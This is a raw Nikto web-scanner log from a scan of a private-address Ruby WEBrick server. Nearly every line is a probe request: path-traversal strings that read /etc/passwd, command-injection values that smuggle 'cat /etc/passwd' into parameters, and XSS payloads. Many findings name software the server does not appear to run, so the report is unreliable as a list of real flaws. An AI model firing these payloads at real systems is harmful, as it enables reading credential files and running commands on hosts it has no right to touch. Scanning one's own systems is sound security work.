- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.0
+ Target Hostname:    192.168.56.0
+ Target Port:        3500
+ Start Time:         2022-04-11 11:22:53 (GMT2)
---------------------------------------------------------------------------
+ Server: WEBrick/1.3.1 (Ruby/2.3.8/2018-10-18)
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/b56dd5f9363ed0f7bd4d11c36d9471dd 
+ Uncommon header 'x-request-id' found, with contents: 7d8ee2cf-44eb-4934-95ca-32b5e66ef319
+ Uncommon header 'x-runtime' found, with contents: 0.003849
+ Uncommon header 'x-xss-protection' found, with contents: 1; mode=block
+ Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ Uncommon header 'x-content-type-options' found, with contents: nosniff
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ "robots.txt" retrieved but it does not contain any 'disallow' entries (which is odd).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ Cookie _readme_session created without the httponly flag
+ /readme.eml: Remote server may be infected with the Nimda virus.
+ /trace.axd: The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests.
+ OSVDB-2400: /admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv: iPlanet Administration Server 5.1 allows remote users to download any file from the server. Upgrade to SunOne DS5.2 and in iDS5.1 SP2 Hotfix 2.
+ OSVDB-5553: /netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd: Sybex E-Trainer allows arbitrary files to be retrieved.
+ ///etc/passwd: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-50624: /albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd: Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retreival. Upgrade to the latest at http://www.chezgreg.net/coppermine/
+ OSVDB-9028: /autohtml.php?op=modload&mainfile=x&name=/etc/passwd: php-proxima 6.0 and below allows arbitrary files to be retrieved.
+ OSVDB-49354: /atomicboard/index.php?location=../../../../../../../../../../etc/passwd: AtomicBoard v0.6.2 allows remote users to read arbitrary files.
+ OSVDB-54099: /current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1: w-agora 4.1.5 allows any file to be retrieved from the remote host.
+ OSVDB-3012: /current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00: w-agora 4.1.5 allows any file to be retrieved from the remote host.
+ OSVDB-54058: /dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00: Typo3 allows any file to be retrieved remotely. Upgrade to the latest version.
+ OSVDB-59600: /ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1: eZ httpbench version 1.1 allows any file on the remote server to be retrieved.
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd: Default JRun CGI lets users read any system file.
+ OSVDB-51750: /k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor: Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.
+ /nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0: nCUBE Server Manage 1.0 allows any file to be read on the remote system.
+ OSVDB-2829: /phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd: phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.
+ /phptonuke.php?filnavn=/etc/passwd: Photonouke or myphpnuke allows arbitrary files to be retrieved from the remote host.
+ /put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd: NCR's Terradata server contains a CGI that allows any file to be retrieved remotely.
+ OSVDB-521: /ROADS/cgi-bin/search.pl?form=../../../../../../../../../../etc/passwd%00: The ROADS search.pl allows attackers to retrieve system files.
+ /support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd: This CGI allows attackers to read files on the host.
+ /viewpage.php?file=/etc/passwd: PHP-Nuke script viewpage.php allows any file to be retrieved from the remote system.
+ OSVDB-431: /Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html: eXtropia's Web Store lets attackers read any file on the system by appending a %00.html to the name.
+ OSVDB-9055: /webMathematica/MSP?MSPStoreID=../../../../../../../../../../etc/passwd&MSPStoreType=image/gif: Wolfram Research's webMathematica allows any file to be read on the remote system. Upgrade to the latest version on http://www.wolfram.com/
+ OSVDB-17110: /servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00: The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.
+ /webcalendar/forum.php?user_inc=../../../../../../../../../../etc/passwd: Webcalendar 0.9.41 and below allow remote users to read arbitrary files.
+ OSVDB-15392: /logbook.pl?file=../../../../../../../bin/cat%20/etc/passwd%00|: Wordit Limited 2000 allows command execution.
+ OSVDB-59084: /page.cgi?../../../../../../../../../../etc/passwd: WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval.
+ OSVDB-56290: /edittag/edittag.cgi?file=%2F..%2F..%2F..%2F..%2F..%2Fetc/passwd: EditTag allows arbitrary file retrieval.
+ OSVDB-8983: /base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1: Remote file retrieval.
+ OSVDB-16861: /athenareg.php?pass=%20;cat%20/etc/passwd: Athena web registration remote command execution.
+ OSVDB-278: /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd: This default Netscape file allows an attacker to read arbitrary files on the host.
+ /search?NS-query-pat=../../../../../../../../../../etc/passwd: The iPlanet server allows arbitrary files to be retrieved through the search functionality. Install 4.1 SP10+ or 6.0 SP3+
+ /................../etc/passwd: The web server allows the password file to be retrieved.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-4598: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-8956: /basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu: Remote file retrieval.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-2713: /jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd: The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. http://www.securityfocus.com/bid/1386.
+ OSVDB-2793: /.../.../.../.../.../.../.../.../.../.../etc/passwd: TelCondex SimpleWebserver 2.13.31027 and below allows directory traversal.
+ OSVDB-3092: /readme: This might be interesting...
+ OSVDB-3092: /etc/passwd: An '/etc/passwd' file is available via the web site.
+ OSVDB-3092: /readme.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3093: /forum-ra.asp?n=....//....//....//....//....//....//....//etc.passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra.asp?n=../../../../../../../../../etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra.asp?n=../../../../../../../../../etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra.asp?n=/etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra.asp?n=/etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra_professionnel.asp?n=%60/etc/passwd%60: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra_professionnel.asp?n=../../../../../../../../../etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra_professionnel.asp?n=/../../../../../../etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra_professionnel.asp?n=/../../../etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra_professionnel.asp?n=/etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum-ra_professionnel.asp?n=/etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=%60/etc/passwd%60&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=/../../../../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=/../../../etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=/etc/passwd%00&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=/etc/passwd&amp;nn=269|200|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=1753&amp;nn=%60/etc/passwd%60: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=1753&amp;nn=....//....//....//....//....//....//....//etc.passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=1753&amp;nn=../../../../../../../../../../etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=1753&amp;nn=/etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1.asp?n=1753&amp;nn=/etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=%60/etc/passwd%60&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=....//....//....//....//....//....//....//etc.passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=../../../../../../../../../etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=/../../../../../../../../etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=/etc/passwd%00&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=/etc/passwd&amp;nn=100&amp;page=1|234|800a0bcd|Either_BOF_or_EOF_is_True__or_the_current_record_has_been_deleted._Requested_operation_requires_a_current_record.: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=%60/etc/passwd%60&amp;page=1: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=....//....//....//....//....//....//....//etc.passwd&amp;page=1: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=../../../../../../../../../etc/passwd%00&amp;page=1: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=/../../../../../../../../etc/passwd&amp;page=1: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd%00&amp;page=1: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=/etc/passwd&amp;page=1: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=%60/etc/passwd%60: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=....//....//....//....//....//....//....//etc.passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=../../../../../../../../../etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/../../../../../../../../../../etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=../../../../../../etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif_infos.asp?n=%60/etc/passwd%60: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif_infos.asp?n=....//....//....//....//....//....//....//etc.passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif_infos.asp?n=../../../../../../../../../etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif_infos.asp?n=/../../../../../../../../../etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif_infos.asp?n=/etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif_infos.asp?n=/etc/passwd%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /setpasswd.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tmp_view.php?file=/etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3396: /mylog.html?screen=/etc/passwd: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /mylog.phtml?screen=/etc/passwd: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /php/mylog.html?screen=/etc/passwd: Remote file read vulnerability 1999-0346
+ OSVDB-3396: /php/mylog.phtml?screen=/etc/passwd: Remote file read vulnerability 1999-0346
+ OSVDB-3407: /directory.php?dir=%3Bcat%20/etc/passwd: Marcus S. Xenakis directory.php script allows for command execution. CVE-2002-0434.
+ OSVDB-3410: /content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:: SunPS iRunbook Version 2.5.2 allows files to be read remotely.
+ OSVDB-3410: /content/base/build/explorer/none.php?/etc/passwd: SunPS iRunbook Version 2.5.2 allows files to be read remotely.
+ OSVDB-3412: /bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-3412: /postnuke/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-3412: /postnuke/html/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-3412: /modules/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-3412: /phpBB/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-3412: /forum/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-3566: /shop/normal_html.cgi?file=../../../../../../etc/issue%00: Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. CVE-2003-0243.
+ OSVDB-3566: /shop/normal_html.cgi?file=;cat%20/etc/passwd|: Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.
+ OSVDB-3566: /shop/normal_html.cgi?file=|cat%20/etc/passwd|: Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.
+ OSVDB-3567: /shop/member_html.cgi?file=;cat%20/etc/passwd|: Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.
+ OSVDB-3567: /shop/member_html.cgi?file=|cat%20/etc/passwd|: Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.
+ OSVDB-3800: /3rdparty/phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00: phpMyAdmin is vulnerable to a directory traversal attack.
+ OSVDB-3800: /phpMyAdmin/export.php?what=../../../../../../../../../../../../etc/passwd%00: phpMyAdmin is vulnerable to a directory traversal attack.
+ OSVDB-3800: /3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00: phpMyAdmin is vulnerable to a directory traversal attack.
+ OSVDB-3800: /phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd%00: phpMyAdmin is vulnerable to a directory traversal attack.
+ OSVDB-3800: /pma/export.php?what=../../../../../../../../../../../../etc/passwd%00: phpMyAdmin is vulnerable to a directory traversal attack.
+ OSVDB-383: /~nobody/etc/passwd: Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf.
+ OSVDB-3861: /dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00: This install of DCForum allows attackers to read arbitrary files on the host.
+ OSVDB-4191: /viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1: KorWebLog from http://weblog.kldp.org/ allows any file to be read on the system.
+ OSVDB-4775: /shoutbox.php?conf=../../../../../../../etc/passwd: Webfroot Shoutbox 2.32 and below allows any file to be read from the system.
+ OSVDB-5089: /admin/system.php3?cmd=cat%20/etc/passwd: DotBr 0.1 allows remote command execution.
+ OSVDB-5090: /admin/exec.php3?cmd=cat%20/etc/passwd: DotBr 0.1 allows remote command execution.
+ OSVDB-524: /bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-524: /postnuke/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-524: /postnuke/html/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-524: /modules/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-524: /phpBB/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-524: /forum/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK: PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320
+ OSVDB-543: /opendir.php?/etc/passwd: This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321
+ OSVDB-543: /opendir.php?requesturl=/etc/passwd: This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321
+ OSVDB-677: /gallery/index.php?include=../../../../../../../../../etc/passwd: Gallery allows files to be read remotely. CVE-2001-0900.
+ OSVDB-677: /modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd: Gallery Addon for PHP-Nuke allows files to be read remotely. CVE-2001-0900.
+ OSVDB-694: /phprocketaddin/?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.
+ /wp-app.log: Wordpress' wp-app.log may leak application/system details.
+ OSVDB-59001: /axis2/services/Version?xsd=../../../../../../../../../../../etc/passwd: Apache Axis2 contains a directory traversal in the Version program.
+ 6544 items checked: 0 error(s) and 153 item(s) reported on remote host
+ End Time:           2022-04-11 11:28:38 (GMT2) (345 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
